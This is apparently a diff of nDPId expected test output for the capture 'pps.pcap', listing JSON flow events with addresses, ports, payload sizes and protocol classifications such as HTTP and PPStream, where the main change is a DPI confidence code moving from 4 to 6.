-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191688,"flow_last_seen":1467353191722,"flow_idle_time":7580000,"flow_min_l4_payload_len":237,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":787,"flow_avg_l4_payload_len":393,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353156959,"flow_last_seen":1467353156998,"flow_idle_time":7580000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":376,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157063,"flow_last_seen":1467353157103,"flow_idle_time":7580000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":425,"flow_tot_l4_payload_len":728,"flow_avg_l4_payload_len":364,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191688,"flow_last_seen":1467353191722,"flow_idle_time":7580000,"flow_min_l4_payload_len":237,"flow_max_l4_payload_len":550,"flow_tot_l4_payload_len":787,"flow_avg_l4_payload_len":393,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50769,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1467353136439,"flow_last_seen":1467353136982,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1083,"flow_tot_l4_payload_len":10732,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.197.138.12","src_port":22793,"dst_port":6956,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":101,"flow_first_seen":1467353136433,"flow_last_seen":1467353136982,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1065,"flow_tot_l4_payload_len":34577,"flow_avg_l4_payload_len":342,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"118.171.15.56","dst_ip":"192.168.115.8","src_port":5544,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136616,"flow_last_seen":1467353136617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50462,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139505,"flow_last_seen":1467353139595,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":360,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139627,"flow_last_seen":1467353139779,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139662,"flow_last_seen":1467353139771,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1467353139819,"flow_last_seen":1467353142600,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":2080,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140709,"flow_last_seen":1467353140888,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140628,"flow_last_seen":1467353140677,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":593,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140655,"flow_last_seen":1467353140720,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1032,"flow_avg_l4_payload_len":516,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353141138,"flow_last_seen":1467353141308,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":705,"flow_avg_l4_payload_len":352,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147705,"flow_last_seen":1467353147794,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":254,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147927,"flow_last_seen":1467353148016,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353150114,"flow_last_seen":1467353150272,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139505,"flow_last_seen":1467353139595,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":720,"flow_avg_l4_payload_len":360,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139627,"flow_last_seen":1467353139779,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":664,"flow_avg_l4_payload_len":332,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139662,"flow_last_seen":1467353139771,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1467353139819,"flow_last_seen":1467353142600,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":2080,"flow_avg_l4_payload_len":520,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140709,"flow_last_seen":1467353140888,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":890,"flow_tot_l4_payload_len":1035,"flow_avg_l4_payload_len":517,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140628,"flow_last_seen":1467353140677,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1046,"flow_tot_l4_payload_len":1186,"flow_avg_l4_payload_len":593,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50474,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353140655,"flow_last_seen":1467353140720,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":887,"flow_tot_l4_payload_len":1032,"flow_avg_l4_payload_len":516,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50475,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353141138,"flow_last_seen":1467353141308,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":560,"flow_tot_l4_payload_len":705,"flow_avg_l4_payload_len":352,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50477,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147705,"flow_last_seen":1467353147794,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":363,"flow_tot_l4_payload_len":508,"flow_avg_l4_payload_len":254,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50483,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353147927,"flow_last_seen":1467353148016,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":568,"flow_tot_l4_payload_len":713,"flow_avg_l4_payload_len":356,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353150114,"flow_last_seen":1467353150272,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157468,"flow_last_seen":1467353157533,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353165300,"flow_last_seen":1467353165845,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353172912,"flow_last_seen":1467353180202,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1930,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353180357,"flow_last_seen":1467353180443,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353185940,"flow_last_seen":1467353186002,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":774,"flow_avg_l4_payload_len":387,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353157468,"flow_last_seen":1467353157533,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":1037,"flow_avg_l4_payload_len":518,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50493,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353165300,"flow_last_seen":1467353165845,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50495,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353172912,"flow_last_seen":1467353180202,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1930,"flow_avg_l4_payload_len":643,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50501,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353180357,"flow_last_seen":1467353180443,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":1038,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50502,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353185940,"flow_last_seen":1467353186002,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":774,"flow_avg_l4_payload_len":387,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50503,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 